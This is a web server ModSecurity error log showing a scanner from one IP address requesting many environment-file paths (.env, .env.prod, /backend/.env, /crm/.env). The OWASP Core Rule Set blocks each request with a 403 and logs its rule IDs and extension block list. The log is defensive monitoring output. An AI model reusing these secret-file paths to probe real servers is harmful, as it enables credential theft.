[Thu Dec 18 01:52:26.055943 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsAAAAAE"]
[Thu Dec 18 01:52:26.056105 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsAAAAAE"]
[Thu Dec 18 01:52:26.056258 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsAAAAAE"]
[Thu Dec 18 01:52:26.092689 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsQAAAAE"]
[Thu Dec 18 01:52:26.092843 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsQAAAAE"]
[Thu Dec 18 01:52:26.092997 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsQAAAAE"]
[Thu Dec 18 01:52:26.121460 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsgAAAAE"]
[Thu Dec 18 01:52:26.121610 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsgAAAAE"]
[Thu Dec 18 01:52:26.121750 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAsgAAAAE"]
[Thu Dec 18 01:52:26.154204 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAswAAAAE"]
[Thu Dec 18 01:52:26.154407 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAswAAAAE"]
[Thu Dec 18 01:52:26.154610 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUNQSlXYVi-cYqymYgYAswAAAAE"]
[Thu Dec 18 01:52:26.247939 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUNQSlXYVi-cYqymYgYAtgAAAAE"]
[Thu Dec 18 01:52:26.248123 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUNQSlXYVi-cYqymYgYAtgAAAAE"]
[Thu Dec 18 01:52:26.248287 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUNQSlXYVi-cYqymYgYAtgAAAAE"]
[Thu Dec 18 01:52:26.281207 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUNQSlXYVi-cYqymYgYAtwAAAAE"]
[Thu Dec 18 01:52:26.281363 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUNQSlXYVi-cYqymYgYAtwAAAAE"]
[Thu Dec 18 01:52:26.281507 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUNQSlXYVi-cYqymYgYAtwAAAAE"]
[Thu Dec 18 01:52:26.316816 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUNQSlXYVi-cYqymYgYAuAAAAAE"]
[Thu Dec 18 01:52:26.316974 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUNQSlXYVi-cYqymYgYAuAAAAAE"]
[Thu Dec 18 01:52:26.317116 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUNQSlXYVi-cYqymYgYAuAAAAAE"]
[Thu Dec 18 01:52:26.347385 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUNQSlXYVi-cYqymYgYAuQAAAAE"]
[Thu Dec 18 01:52:26.347543 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUNQSlXYVi-cYqymYgYAuQAAAAE"]
[Thu Dec 18 01:52:26.347694 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUNQSlXYVi-cYqymYgYAuQAAAAE"]
[Thu Dec 18 01:52:26.380077 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUNQSlXYVi-cYqymYgYAugAAAAE"]
[Thu Dec 18 01:52:26.380242 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUNQSlXYVi-cYqymYgYAugAAAAE"]
[Thu Dec 18 01:52:26.380401 2025] [:error] [pid 810593] [client 45.148.10.143:38688] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUNQSlXYVi-cYqymYgYAugAAAAE"]
[Thu Dec 18 01:52:26.508109 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNQSoUzQOIP6NNaX_tE9QAAAAY"]
[Thu Dec 18 01:52:26.508220 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNQSoUzQOIP6NNaX_tE9QAAAAY"]
[Thu Dec 18 01:52:26.508388 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNQSoUzQOIP6NNaX_tE9QAAAAY"]
[Thu Dec 18 01:52:26.508543 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNQSoUzQOIP6NNaX_tE9QAAAAY"]
[Thu Dec 18 01:52:26.538636 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUNQSoUzQOIP6NNaX_tE9gAAAAY"]
[Thu Dec 18 01:52:26.538821 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUNQSoUzQOIP6NNaX_tE9gAAAAY"]
[Thu Dec 18 01:52:26.538972 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aUNQSoUzQOIP6NNaX_tE9gAAAAY"]
[Thu Dec 18 01:52:26.618828 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUNQSoUzQOIP6NNaX_tE-AAAAAY"]
[Thu Dec 18 01:52:26.619012 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUNQSoUzQOIP6NNaX_tE-AAAAAY"]
[Thu Dec 18 01:52:26.619171 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aUNQSoUzQOIP6NNaX_tE-AAAAAY"]
[Thu Dec 18 01:52:26.645735 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-QAAAAY"]
[Thu Dec 18 01:52:26.645891 2025] [:error] [pid 810993] [client 45.148.10.143:48390] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aUNQSoUzQOIP6NNaX_tE-QAAAAY"]
